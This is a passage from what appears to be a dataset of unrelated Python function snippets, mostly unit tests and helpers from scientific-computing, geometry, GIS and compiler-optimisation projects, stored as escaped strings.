assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_inside(self):\n\n World.reset()\n\n\n def inside(x, y):\n centers_distance = tf.sqrt(tf.reduce_sum(tf.squared_difference(x[:, 0:2], y[:, 0:2]), axis=1) + 1e-6)\n return tf.cast((centers_distance + x[:, 2]) < y[:, 2], tf.float32)\n\n circles = tfl.Domain(label=\"Circles\", data=[[0., 0, 1], [0,0, 2], [0,0, 3]])\n inside = tfl.Predicate(label=\"inside\", domains=[\"Circles\", \"Circles\"], function=inside)\n tfl.setTNorm(id=tfl.SS, p=1)\n sess = tf.Session()\n\n\n # Constraint 1\n \"zero(x) and one(y)\"\n x = tfl.variable(circles, name=\"x\")\n y = tfl.variable(circles, name=\"y\")\n z = tfl.variable(circles, name=\"z\")\n a = tfl.atom(inside, (x,y))\n b = tfl.atom(inside, (y,z))\n c = tfl.atom(inside, (x,z))\n andd = tfl.and_n(a, b)\n\n rule = tfl.implies(andd,c)\n\n assert np.equal(sess.run(rule), np.zeros(shape=[3,3,3])).all()\n assert len(World._predicates_cache)==1", "def test_operators_functions_unavailable_for_geography(self):\n z = Zipcode.objects.get(code=\"77002\")\n point_field = \"%s.%s::geometry\" % (\n connection.ops.quote_name(City._meta.db_table),\n connection.ops.quote_name(\"point\"),\n )\n # ST_Within.\n qs = City.objects.filter(point__within=z.poly)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"ST_Within({point_field}\", ctx.captured_queries[0][\"sql\"])\n # @ operator.\n qs = City.objects.filter(point__contained=z.poly)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"{point_field} @\", ctx.captured_queries[0][\"sql\"])\n # ~= operator.\n htown = City.objects.get(name=\"Houston\")\n qs = City.objects.filter(point__exact=htown.point)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"{point_field} ~=\", ctx.captured_queries[0][\"sql\"])", "def test_flat(self, expr, result, mode):\n i, j = dimify('i j')\n a = symbol(name='a', dimensions=(i, j), value=2., mode=mode)\n b = symbol(name='b', dimensions=(i, j), value=3., mode=mode)\n fa = a.base.function if mode == 'indexed' else a\n fb = b.base.function if mode == 'indexed' else b\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_data_along(self):\n ex = self.ex\n m = self.m\n n = self.n\n\n nreps = random.randint(1, 10)\n ex.nreps = nreps\n ex.vary[\"X\"][\"with\"].add(\"rep\")\n ex.vary[\"X\"][\"along\"] = 1\n ex.infer_lds()\n\n cmds = ex.generate_cmds()\n\n self.assertIn([\"smalloc\", \"X\", nreps * m * n], cmds)\n repidx = random.randint(0, nreps - 1)\n self.assertIn([\"soffset\", \"X\", repidx * m * n, \"X_%d\" % repidx], cmds)", "def ifind_at(self, x, y):\n for sym in self.itersymbols():\n bx0,by0,bx1,by1 = sym.sym.bbox()\n if bx0 <= x <= bx1 and by0 <= y <= by1:\n yield sym.sym", "def test_compute_pixel_ray_directions_vectorized() -> None:\n fx = 10\n fy = 10\n\n # dummy 2d coordinates in the image plane.\n uv: NDArrayInt = np.array([[12, 2], [12, 2], [12, 2], [12, 2]])\n\n # principal point is at (10,5)\n img_w = 20\n img_h = 10\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx,\n fy_px=fy,\n cx_px=img_w / 2,\n cy_px=img_h / 2,\n height_px=img_h,\n width_px=img_w,\n cam_name=\"ring_front_center\", # dummy name\n )\n ray_dirs = pinhole_camera.compute_pixel_ray_directions(uv)\n\n gt_ray_dir: NDArrayFloat = np.array([2, -3, 10.0])\n gt_ray_dir /= np.linalg.norm(gt_ray_dir)\n\n for i in range(4):\n assert np.allclose(gt_ray_dir, ray_dirs[i])", "def p2p_xyz(start_point, end_point, top_left_cor, cellsize, dem):\n start_cell = (int((start_point[0] - top_left_cor[0]) / cellsize[0]),\n int((start_point[1] - top_left_cor[1]) / cellsize[1]))\n end_cell = (int((end_point[0] - top_left_cor[0]) / cellsize[0]),\n int((end_point[1] - top_left_cor[1]) / cellsize[1]))\n cells = misc.get_line(start_cell, end_cell) \n pnts = []\n elev = []\n \n dem_elv = dem[:,1]\n dem_indx = dem[:,2:4]\n\n for cell in cells:\n x = top_left_cor[0] + cell[0] * cellsize[0] + cellsize[0] / 2\n y = top_left_cor[1] + cell[1] * cellsize[1] + cellsize[1] / 2\n #xy_indx=[str(cell[0]),str(cell[1])]\n z_indx=np.logical_and(np.equal(dem_indx[:,0],cell[0]),np.equal(dem_indx[:,1],cell[1]))\n try:\n z=dem_elv[z_indx][0]\n except (np.sum(z_indx)>1):\n print(\"Oops! That was more than one indices in dem matching the query index (in getCellValue)\")\n #z_indx = [i for i,j in enumerate(dem_indx) if j == xy_indx]\n z = float(dem_elv[z_indx])\n pnts.append((x, y))\n elev.append(z)\n return pnts, elev", "def test_verify():\n Lx = 10; Ly = 10; c = 1.0\n\n def I(x, y):\n return exp(-pow(x-Lx/2.0,2)/2.0 -pow(y-Ly/2.0,2)/2.0)\n def f(x, y, t):\n return sin(2*x) + y\n def bc(x, y, t):\n return sin(t)\n\n # use string formulas instead so also weave can be tested:\n # (need to transfer globals() so that vectorized versions work)\n I = StringFunction('exp(-pow(x-Lx/2.0,2)/2.0 - pow(y-Ly/2.0,2)/2.0)',\n independent_variables=('x', 'y'),\n Lx=Lx, Ly=Ly, globals=globals())\n f = StringFunction('sin(2*x) + y',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n bc = StringFunction('sin(t)',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n\n #nx = 15; ny = 10; tstop = 2\n nx = 4; ny = 3; tstop = 16\n verify_implementations(I, f, c, bc, Lx, Ly, nx, ny, tstop)", "def test_compute_pixel_ray_directions_vectorized_entireimage() -> None:\n fx = 10\n fy = 10\n\n img_w = 100\n img_h = 50\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx,\n fy_px=fy,\n cx_px=img_w / 2,\n cy_px=img_h / 2,\n height_px=img_h,\n width_px=img_w,\n cam_name=\"ring_front_center\", # dummy name\n )\n\n uv_list = []\n for u in range(img_w):\n for v in range(img_h):\n uv_list += [(u, v)]\n\n uv: NDArrayInt = np.array(uv_list)\n assert uv.shape == (img_w * img_h, 2)\n\n ray_dirs = pinhole_camera.compute_pixel_ray_directions(uv)\n\n # compare w/ vectorized, should be identical\n for i, ray_dir_vec in enumerate(ray_dirs):\n u, v = uv[i]\n ray_dir_nonvec = _compute_pixel_ray_direction(u, v, fx, fy, img_w, img_h)\n assert np.allclose(ray_dir_vec, ray_dir_nonvec)", "def __staticLoopBoundScanning(\n self, stmts, tile_level, outer_loop_inames, loop_info_table\n ):\n\n # initialize all returned variables\n scan_stmts = []\n lbound_info_seq = []\n int_vars = []\n\n # generate the lower and upper values of each inter-tile loop\n val_table = {}\n for iname in outer_loop_inames:\n _, _, _, st_exp, _ = loop_info_table[iname]\n lval = ast.IdentExp(self.__getTileIterName(iname, tile_level))\n t = ast.BinOpExp(\n ast.IdentExp(self.__getTileSizeName(iname, tile_level)),\n ast.ParenthExp(st_exp.replicate()),\n ast.BinOpExp.SUB,\n )\n uval = ast.BinOpExp(lval.replicate(), ast.ParenthExp(t), ast.BinOpExp.ADD)\n val_table[iname] = (lval, uval)\n\n # iterate over each statement to determine loop bounds that are affine functions\n # of outer loop iterators\n lb_exps_table = {}\n ub_exps_table = {}\n for stmt in stmts:\n\n # skip all non loop statements\n if not isinstance(stmt, ast.ForStmt):\n lbound_info_seq.append(None)\n continue\n\n # extract this loop structure\n id, lb_exp, ub_exp, st_exp, lbody = self.ast_util.getForLoopInfo(stmt)\n\n # see if the loop bound expressions are bound/free of outer loop iterators\n lb_inames = filter(\n lambda i: self.ast_util.containIdentName(lb_exp, i), outer_loop_inames\n )\n ub_inames = filter(\n lambda i: self.ast_util.containIdentName(ub_exp, i), outer_loop_inames\n )\n\n # skip loops with bound expressions that are free of outer loop iterators\n if not lb_inames and not ub_inames:\n lbound_info_seq.append(None)\n continue\n\n # check if this loop runs only once\n is_one_time_loop = str(lb_exp) == str(ub_exp)\n\n # generate booleans to indicate the needs of prolog, epilog, and orio.main.tiled loop\n if is_one_time_loop:\n need_tiled_loop = False\n need_prolog = False\n need_epilog = False\n else:\n need_tiled_loop = True\n need_prolog = len(lb_inames) > 0\n need_epilog = len(ub_inames) > 0\n\n # generate new variable names for both the new lower and upper loop bounds\n if need_tiled_loop:\n lb_name, ub_name = self.__getLoopBoundNames()\n int_vars.extend([lb_name, ub_name])\n else:\n lb_name = \"\"\n ub_name = \"\"\n\n # append information about the new loop bounds\n lbinfo = (lb_name, ub_name, need_prolog, need_epilog, need_tiled_loop)\n lbound_info_seq.append(lbinfo)\n\n # skip generating loop-bound scanning code (if it's a one-time loop)\n if not need_tiled_loop:\n continue\n\n # determine the value of the new lower loop bound\n if str(lb_exp) in lb_exps_table:\n lb_var = lb_exps_table[str(lb_exp)]\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), lb_var.replicate(), ast.BinOpExp.EQ_ASGN\n )\n else:\n if need_prolog:\n t = self.__findMinMaxVal(\n \"max\", lb_exp.replicate(), lb_inames, val_table\n )\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), t.replicate(), ast.BinOpExp.EQ_ASGN\n )\n else:\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), lb_exp.replicate(), ast.BinOpExp.EQ_ASGN\n )\n lb_exps_table[str(lb_exp)] = ast.IdentExp(lb_name)\n scan_stmts.append(ast.ExpStmt(a))\n\n # determine the value of the new upper loop bound\n if str(ub_exp) in ub_exps_table:\n ub_var = ub_exps_table[str(ub_exp)]\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), ub_var.replicate(), ast.BinOpExp.EQ_ASGN\n )\n else:\n if need_epilog:\n t = self.__findMinMaxVal(\n \"min\", ub_exp.replicate(), ub_inames, val_table\n )\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), t.replicate(), ast.BinOpExp.EQ_ASGN\n )\n else:\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), ub_exp.replicate(), ast.BinOpExp.EQ_ASGN\n )\n ub_exps_table[str(ub_exp)] = ast.IdentExp(ub_name)\n scan_stmts.append(ast.ExpStmt(a))\n\n # return all necessary information\n return (scan_stmts, lbound_info_seq, int_vars)", "def test_G_ind(self):\r\n a = array([[29, 11], [273, 191], [8, 31], [64, 64]])\r\n self.assertFloatEqual(G_ind(a)[0], 28.59642)\r\n self.assertFloatEqual(G_ind(a, True)[0], 28.31244)", "def test_arithmetic(self):\n structure_memoizer = {\n defaults.DENOMINATOR_LOWER_BOUND_KEY: 0.0,\n defaults.GLOBAL_STEP_KEY: tf.compat.v2.Variable(0, dtype=tf.int32)\n }\n\n def constant_expression(penalty_constant, constraint_constant=None):\n penalty_basic_expression = basic_expression.BasicExpression(\n [term.TensorTerm(tf.constant(penalty_constant, dtype=tf.float32))])\n if constraint_constant is None:\n constraint_basic_expression = penalty_basic_expression\n else:\n constraint_basic_expression = basic_expression.BasicExpression([\n term.TensorTerm(tf.constant(constraint_constant, dtype=tf.float32))\n ])\n return expression.ExplicitExpression(penalty_basic_expression,\n constraint_basic_expression)\n\n # This expression exercises all of the operators.\n expression_object = (\n constant_expression(0.3) - (constant_expression(-3.6, -0.2) / 2.3 +\n 0.7 * constant_expression(1.5, -0.5)) -\n (constant_expression(1.2) + constant_expression(0.4, 2.3) -\n constant_expression(0.1)) * 0.6 + constant_expression(0.8))\n\n actual_penalty_value = expression_object.penalty_expression.evaluate(\n structure_memoizer)\n actual_constraint_value = expression_object.constraint_expression.evaluate(\n structure_memoizer)\n\n # We need to explicitly create the variables before creating the wrapped\n # session.\n variables = deferred_tensor.DeferredVariableList(\n actual_penalty_value.variables + actual_constraint_value.variables)\n for variable in variables:\n variable.create(structure_memoizer)\n\n # This is the same expression as above, applied directly to the python\n # floats.\n expected_penalty_value = (0.3 - (-3.6 / 2.3 + 0.7 * 1.5) -\n (1.2 + 0.4 - 0.1) * 0.6 + 0.8)\n expected_constraint_value = (0.3 - (-0.2 / 2.3 + 0.7 * -0.5) -\n (1.2 + 2.3 - 0.1) * 0.6 + 0.8)\n\n with self.wrapped_session() as session:\n self.assertNear(\n expected_penalty_value,\n session.run(actual_penalty_value(structure_memoizer)),\n err=1e-6)\n self.assertNear(\n expected_constraint_value,\n session.run(actual_constraint_value(structure_memoizer)),\n err=1e-6)", "def loc_eval(x, b):\r\n loc_est = 0\r\n for i in enumerate(b): loc_est+=i[1]*(x**i[0])\r\n return(loc_est)", "def test_bit_and_offset_out_of_range(self):\n value = bytearray()\n value.append(0)\n ops = [bitwise_operations.bit_and(self.five_255_bin, 41, 8, 1, value, None)]\n\n with pytest.raises(e.OpNotApplicable):\n self.as_connection.operate(self.test_key, ops)", "def _in_range_op(spec):", "def run_2dtest(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n xlin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n ylin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n X,Y = np.meshgrid(xlin, ylin)\n\n # Store resulting LoS integrations in results\n results = X\n for i in range(0,num_sight_lines+1):\n for j in range(0,num_sight_lines+1): \n results[i,j] = testsph(X[i,j],Y[i,j],smoothing,dim=dim)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n\n # Have to integrate across x for every y\n Int_step = np.zeros( num_sight_lines+1 )\n for iy in range(0, num_sight_lines+1):\n isfin = np.isfinite(results[iy,:])\n Int_step[iy] = integrate.trapz(results[iy,isfin], xlin[isfin])\n # Now integrate across y\n isfin = np.isfinite(Int_step)\n particle_integral = integrate.trapz(Int_step[isfin], ylin[isfin])\n # \"All smoothing lengths should integrate to the same value of unity \"\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n isfin = np.isfinite(results[0,:])\n traces.append(go.Scatter(y=results[0,isfin], x=xlin[isfin]))\n\n # The integral of the entire particle should be unity, the trace of axis will not be however\n plot(traces)", "def test_coord_preceding_fs(self):", "def _set_bounds(b, x, n):\n for j in range(1, n - 1):\n for i in range(1, n - 1):\n x[index_of(i, j, 0, n)] = -x[index_of(i, j, 1, n)] if b == 3 else x[index_of(i, j, 1, n)]\n x[index_of(i, j, 0, n - 1)] = -x[index_of(i, j, 1, n - 2)] if b == 3 else x[index_of(i, j, 1, n - 2)]\n for k in range(1, n - 1):\n for i in range(1, n - 1):\n x[index_of(i, 0, k, n)] = -x[index_of(i, 1, k, n)] if b == 2 else x[index_of(i, 1, k, n)]\n x[index_of(i, n - 1, 0, n - 1)] = -x[index_of(i, n - 2, k, n - 2)] if b == 2 else x[\n index_of(i, n - 2, k, n - 2)]\n for k in range(1, n - 1):\n for j in range(1, n - 1):\n x[index_of(0, j, k, n)] = -x[index_of(1, j, k, n)] if b == 1 else x[index_of(1, j, k, n)]\n x[index_of(n - 1, j, k, n - 1)] = -x[index_of(n - 2, j, k, n)] if b == 1 else x[\n index_of(n - 2, j, k, n)]\n\n x[index_of(0, 0, 0, n)] = 1 / 3 * (x[index_of(1, 0, 0, n)] + x[index_of(0, 1, 0, n)] + x[index_of(0, 0, 1, n)])\n x[index_of(0, n - 1, 0, n)] = 1 / 3 * (\n x[index_of(1, n - 1, 0, n)] + x[index_of(0, n - 2, 0, n)] + x[index_of(0, n - 1, 1, n)])\n x[index_of(0, 0, n - 1, n)] = 1 / 3 * (\n x[index_of(1, 0, n - 1, n)] + x[index_of(0, 1, n - 1, n)] + x[index_of(0, 0, n - 2, n)])\n x[index_of(0, n - 1, n - 1, n)] = 1 / 3 * (\n x[index_of(1, n - 1, n - 1, n)] + x[index_of(0, n - 2, n - 1, n)] + x[index_of(0, n - 1, n - 2, n)])\n x[index_of(n - 1, 0, 0, n)] = 1 / 3 * (\n x[index_of(n - 2, 0, 0, n)] + x[index_of(n - 1, 1, 0, n)] + x[index_of(n - 1, 0, 1, n)])\n x[index_of(n - 1, n - 1, 0, n)] = 1 / 3 * (\n x[index_of(n - 2, n - 1, 0, n)] + x[index_of(n - 1, n - 2, 0, n)] + x[index_of(n - 1, n - 1, 1, n)])\n x[index_of(n - 1, 0, n - 1, n)] = 1 / 3 * (\n x[index_of(n - 2, 0, n - 1, n)] + x[index_of(n - 1, 1, n - 1, n)] + x[index_of(n - 1, 0, n - 2, n)])\n x[index_of(n - 1, n - 1, n - 1, n)] = 1 / 3 * (\n x[index_of(n - 2, n - 1, n - 1, n)] + x[index_of(n - 1, n - 2, n - 1, n)] + x[\n index_of(n - 1, n - 1, n - 2, n)])", "def test_non_sparse():\n A, b, c = ex3()\n interior(A, b, c)", "def _trace_dense(op): # pragma: no cover\n x = 0.0\n for i in range(op.shape[0]):\n x += op[i, i]\n return x", "def test(p):\n while p.quadrant() != TOP_RIGHT_QUAD:\n if p.x < 0:\n p = p.reflect_y()\n else:\n p = p.reflect_x()\n return p", "def test_handling_of_variable_bound_sums_in_trivial_summation(free_alg):\n\n dr = free_alg\n p = dr.names\n\n v = p.v\n r = p.R\n i = p.i\n alpha = p.alpha\n s = p.S\n n = Symbol('N')\n\n first = dr.sum((i, r[0, n]), (alpha, s[0, n]), v[alpha])\n\n # First trial, when the dummy is not actually used.\n assert dr.simplify(\n first\n ) == dr.sum((alpha, s[0, n]), n * v[alpha])\n\n # When i is used in the bounds of summation over alpha, it should be kept.\n second = dr.sum((i, r[0, n]), (alpha, s[0, i]), v[alpha])\n assert dr.simplify(\n second\n ) == second", "def test08(self):\n a = np.arange(1, 11)\n b = bcolz.carray(a)\n ul = [v for v in a if v <= 5]\n u = b.where(a <= 5)\n wl = [v for v in a if v <= 6]\n w = b.where(a <= 6)\n self.assertEqual(ul, list(u))\n self.assertEqual(wl, list(w))", "def evaluate(bounds , func):\n if len(bounds) != 2:\n raise ValueError(\"Bounds should contain 2 elements, found %d.\" % len(bounds))\n\n a = bounds[0]\n b = bounds[1]\n ya = func(a)\n yb = func((a+b)/2.)\n yc = func(b)\n I = (b-a) * (ya + 4. * yb + yc) / 6.\n return I", "def inSquare(x, y, xmci, ymci, ell, w) :\n ind = np.array([], int)\n \n for j in range(len(x)) :\n if (np.abs(x[j] - xmci) <= w) and (np.abs(y[j] - ymci) <= ell) :\n ind = np.hstack((ind, j))\n \n return ind", "def test_elemwise_composite_support_code():\r\n X = tcn.shared_constructor(value=numpy.zeros((100, 10), dtype=\"float32\"),\r\n name='X')\r\n W = tcn.shared_constructor(value=numpy.zeros((10, 1), dtype=\"float32\"),\r\n name='W')\r\n U = T.dot(X, W)\r\n Y = tcn.shared_constructor(value=numpy.zeros((100, 1), dtype=\"float32\"),\r\n name='Y')\r\n P = T.exp(-(Y - U) ** 2)\r\n epsilon = numpy.asarray(0.001, dtype=\"float32\")\r\n NLL = -T.mean(T.log(P + epsilon)) # SupportCodeError\r\n G = theano.gradient.grad(NLL, wrt=[W])\r\n\r\n backup = theano.config.warn.identify_1pexp_bug\r\n theano.config.warn.identify_1pexp_bug = False\r\n try:\r\n f_grad = theano.function(inputs=[], outputs=G, mode=mode_with_gpu)\r\n finally:\r\n theano.config.warn.identify_1pexp_bug = backup\r\n f_grad()\r\n\r\n topo = f_grad.maker.fgraph.toposort()\r\n assert sum([isinstance(node.op, T.Elemwise) for node in topo]) == 1\r\n #I suspect this was failing in the original branch too\r\n assert sum([isinstance(node.op, tcn.GpuElemwise) for node in topo]) == 1", "def test_nofission_as_illegal():\n grid = Grid(shape=(20, 20))\n x, y = grid.dimensions\n\n f = Function(name='f', grid=grid, dimensions=(y,), shape=(20,))\n u = TimeFunction(name='u', grid=grid)\n v = TimeFunction(name='v', grid=grid)\n\n eqns = [Inc(f, v + 1.),\n Eq(u.forward, f[y + 1] + 1.)]\n\n op = Operator(eqns, opt='fission')\n\n assert_structure(op, ['t,x,y', 't,x,y'], 't,x,y,y')", "def test_endpoint_slope(b,c,d,x_n_minus_1,x_n,expected_slope):\n\tactual_slope = b + 2*c*(x_n-x_n_minus_1) + 3*d*(x_n-x_n_minus_1)**2\n\tresult = abs(actual_slope-expected_slope)<0.001\n\treturn(result)", "def test_special_PSX(self, angexp):\n a, b, c = angexp[0]\n tgt = U3Gate(a, b, c).to_matrix()\n exp = {(\"p\", \"sx\")[g]: angexp[1][g] for g in (0, 1) if angexp[1][g]}\n self.check_oneq_special_cases(tgt, \"PSX\", exp)", "def expr(self):\n\n args = []\n for i in self.indices:\n args.extend((i.j, i.m))\n return Wigner3j(*args)", "def __getLoopBoundScanningStmts(\n self, stmts, tile_level, outer_loop_inames, loop_info_table\n ):\n\n # (optimization) generate code that determines the loop bounds of full tiles at compile time\n if self.affine_lbound_exps:\n return self.__staticLoopBoundScanning(\n stmts, tile_level, outer_loop_inames, loop_info_table\n )\n\n # initialize all returned variables\n scan_stmts = []\n lbound_info_seq = []\n int_vars = []\n\n # iterate over each statement to find loop bounds that are functions of outer loop iterators\n min_int = ast.NumLitExp(-2147483648, ast.NumLitExp.INT)\n max_int = ast.NumLitExp(2147483647, ast.NumLitExp.INT)\n lb_exps_table = {}\n ub_exps_table = {}\n pre_scan_stmts = []\n post_scan_stmts = []\n scan_loops = SimpleLoops()\n for stmt in stmts:\n\n # skip all non loop statements\n if not isinstance(stmt, ast.ForStmt):\n lbound_info_seq.append(None)\n continue\n\n # extract this loop structure\n id, lb_exp, ub_exp, st_exp, lbody = self.ast_util.getForLoopInfo(stmt)\n\n # see if the loop bound expressions are bound/free of outer loop iterators\n lb_inames = filter(\n lambda i: self.ast_util.containIdentName(lb_exp, i), outer_loop_inames\n )\n ub_inames = filter(\n lambda i: self.ast_util.containIdentName(ub_exp, i), outer_loop_inames\n )\n\n # skip loops with bound expressions that are free of outer loop iterators\n if not lb_inames and not ub_inames:\n lbound_info_seq.append(None)\n continue\n\n # check if this loop runs only once\n is_one_time_loop = str(lb_exp) == str(ub_exp)\n\n # generate booleans to indicate the needs of prolog, epilog, and orio.main.tiled loop\n if is_one_time_loop:\n need_tiled_loop = False\n need_prolog = False\n need_epilog = False\n else:\n need_tiled_loop = True\n need_prolog = len(lb_inames) > 0\n need_epilog = len(ub_inames) > 0\n\n # generate new variable names for both the new lower and upper loop bounds\n if need_tiled_loop:\n lb_name, ub_name = self.__getLoopBoundNames()\n int_vars.extend([lb_name, ub_name])\n else:\n lb_name = \"\"\n ub_name = \"\"\n\n # append information about the new loop bounds\n lbinfo = (lb_name, ub_name, need_prolog, need_epilog, need_tiled_loop)\n lbound_info_seq.append(lbinfo)\n\n # skip generating loop-bound scanning code (if it's a one-time loop)\n if not need_tiled_loop:\n continue\n\n # generate loop-bound scanning code for the prolog\n if str(lb_exp) in lb_exps_table:\n lb_var = lb_exps_table[str(lb_exp)]\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), lb_var.replicate(), ast.BinOpExp.EQ_ASGN\n )\n post_scan_stmts.append(ast.ExpStmt(a))\n else:\n if need_prolog:\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), min_int.replicate(), ast.BinOpExp.EQ_ASGN\n )\n pre_scan_stmts.append(ast.ExpStmt(a))\n a = ast.BinOpExp(\n ast.IdentExp(lb_name),\n ast.FunCallExp(\n ast.IdentExp(\"max\"),\n [ast.IdentExp(lb_name), lb_exp.replicate()],\n ),\n ast.BinOpExp.EQ_ASGN,\n )\n scan_loops.insertLoop(lb_inames, ast.ExpStmt(a))\n else:\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), lb_exp.replicate(), ast.BinOpExp.EQ_ASGN\n )\n pre_scan_stmts.append(ast.ExpStmt(a))\n lb_exps_table[str(lb_exp)] = ast.IdentExp(lb_name)\n\n # generate loop-bound scaning code for the epilog\n if str(ub_exp) in ub_exps_table:\n ub_var = ub_exps_table[str(ub_exp)]\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), ub_var.replicate(), ast.BinOpExp.EQ_ASGN\n )\n post_scan_stmts.append(ast.ExpStmt(a))\n else:\n if need_epilog:\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), max_int.replicate(), ast.BinOpExp.EQ_ASGN\n )\n pre_scan_stmts.append(ast.ExpStmt(a))\n a = ast.BinOpExp(\n ast.IdentExp(ub_name),\n ast.FunCallExp(\n ast.IdentExp(\"min\"),\n [ast.IdentExp(ub_name), ub_exp.replicate()],\n ),\n ast.BinOpExp.EQ_ASGN,\n )\n scan_loops.insertLoop(ub_inames, ast.ExpStmt(a))\n else:\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), ub_exp.replicate(), ast.BinOpExp.EQ_ASGN\n )\n pre_scan_stmts.append(ast.ExpStmt(a))\n ub_exps_table[str(ub_exp)] = ast.IdentExp(ub_name)\n\n # build a new loop information tabe for generating the loop-bound scanning code\n n_loop_info_table = {}\n for iname, linfo in loop_info_table.items():\n _, _, _, st_exp, _ = linfo\n n_loop_info_table[iname] = (\n self.__getTileSizeName(iname, tile_level),\n self.__getTileIterName(iname, tile_level),\n st_exp,\n )\n\n # convert the \"SimpleLoop\" abstractions into loop ASTs\n scan_loop_stmts = scan_loops.convertToASTs(tile_level, n_loop_info_table)\n\n # merge all scanning statements\n scan_stmts = pre_scan_stmts + scan_loop_stmts + post_scan_stmts\n\n # return all necessary information\n return (scan_stmts, lbound_info_seq, int_vars)", "def test_window_funcs():\n # get a PSpecData\n uvd = UVData()\n uvd.read_miriad(\n os.path.join(DATA_PATH, 'zen.even.xx.LST.1.28828.uvOCRSA'),\n use_future_array_shapes=True\n )\n beam = pspecbeam.PSpecBeamUV(os.path.join(DATA_PATH, \"HERA_NF_dipole_power.beamfits\"))\n ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd)], beam=beam)\n ds.set_spw((0, 20))\n ds.set_taper('bh')\n bl = (37, 38)\n key = (0, bl, 'xx')\n d = uvd.get_data(bl)\n C = np.cov(d[:, :20].T).real\n iC = np.linalg.pinv(C)\n # iterate over various R and M matrices and ensure\n # normalization and dtype is consistent\n for data_weight in ['identity', 'iC']:\n ds.set_weighting(data_weight)\n for norm in ['H^-1', 'I', 'V^-1/2']:\n for exact_norm in [True, False]:\n if exact_norm and norm != 'I':\n # exact_norm only supported for norm == 'I'\n continue\n ds.clear_cache()\n if data_weight == 'iC':\n # fill R with iC\n ds._R[(0, (37, 38, 'xx'), 'iC', 'bh')] = iC\n # compute G and H\n Gv = ds.get_G(key, key, exact_norm=exact_norm, pol='xx')\n Hv = ds.get_H(key, key, exact_norm=exact_norm, pol='xx')\n Mv, Wv = ds.get_MW(Gv, Hv, mode=norm, exact_norm=exact_norm,\n band_covar=C)\n # assert row-sum is normalized to 1\n assert np.isclose(Wv.sum(axis=1).real, 1).all()\n # assert this is a real matrix, even though imag is populated\n assert np.isclose(Wv.imag, 0, atol=1e-6).all()", "def omt_check(grade_list_idx, grade_list_i, grade_list_j):\n return grade_list_idx == (grade_list_i + grade_list_j)", "def outer_perimeter(c, stencil=nn_stencil):\n\n return np.logical_and(np.logical_not(c),\n coordination(c, stencil=stencil) > 0)", "def tile_calculation(xi, yi, axi, ayi, positions, weights):\n for j in range(cuda.blockDim.x):\n xj = positions[j,0]\n yj = positions[j,1]\n wj = weights[j]\n axi, ayi = body_body_interaction(xi, yi, xj, yj, wj, axi, ayi)\n return axi, ayi", "def test_inexact_prediace(doctest):", "def test_advanced_manipulations(free_alg):\n dr = free_alg\n p = dr.names\n i, j, k = p.i, p.j, p.k\n\n u = IndexedBase('u')\n v = IndexedBase('v')\n f = Vec('f')\n\n tensor = dr.einst(u[i, j] * f[j] + v[i, j] * f[j])\n assert tensor.n_terms == 2\n\n def has_u(term):\n \"\"\"Test if a term have u tensor.\"\"\"\n return term.amp.has(u)\n\n expect = dr.sum((j, p.R), u[i, j] * f[j])\n for res in [\n tensor.filter(has_u),\n tensor.bind(lambda x: [x] if has_u(x) else [])\n ]:\n assert res.n_terms == 1\n assert res == expect\n\n def subst_i(term):\n \"\"\"Substitute i index in the terms.\"\"\"\n return Term(term.sums, term.amp.xreplace({i: k}), term.vecs)\n\n expect = dr.sum((j, p.R), u[k, j] * f[j] + v[k, j] * f[j])\n for res in [\n tensor.map(subst_i),\n tensor.bind(lambda x: [subst_i(x)]),\n tensor.map2scalars(lambda x: x.xreplace({i: k}))\n ]:\n assert res.n_terms == 2\n assert res == expect\n\n alpha, beta = symbols('alpha beta')\n assert tensor.bind(\n lambda x: [Term(x.sums, x.amp * i_, x.vecs) for i_ in [alpha, beta]]\n ) == (tensor * alpha + tensor * beta)\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k})\n ) == dr.sum((j, p.R), u[i, k] * f[k] + v[i, k] * f[k])\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k}), skip_vecs=True\n ) == dr.sum((j, p.R), u[i, k] * f[j] + v[i, k] * f[j])", "def main():\n argc = len(sys.argv)\n if argc > 1:\n first_arg = sys.argv[1]\n if first_arg == '--test':\n env = environment.Environment()\n execution.execute_statement('x = 3', env)\n execution.execute_statement('x+=7', env)\n execution.execute_statement('y=9.23', env)\n env.new_frame()\n execution.execute_statement('x = 5', env)\n print(env.frames)\n execution.execute_statement('z=\"hello world\"', env)\n execution.execute_statement('z +=\"!!!\"', env)\n execution.execute_statement('a= `gelatin`', env)\n print(env.frames)\n ast = ast2.AST(\"3*4+5 ^ 7\")\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n ast = ast2.AST(\"18+15*9:3+10\")\n print(ast.parse())\n 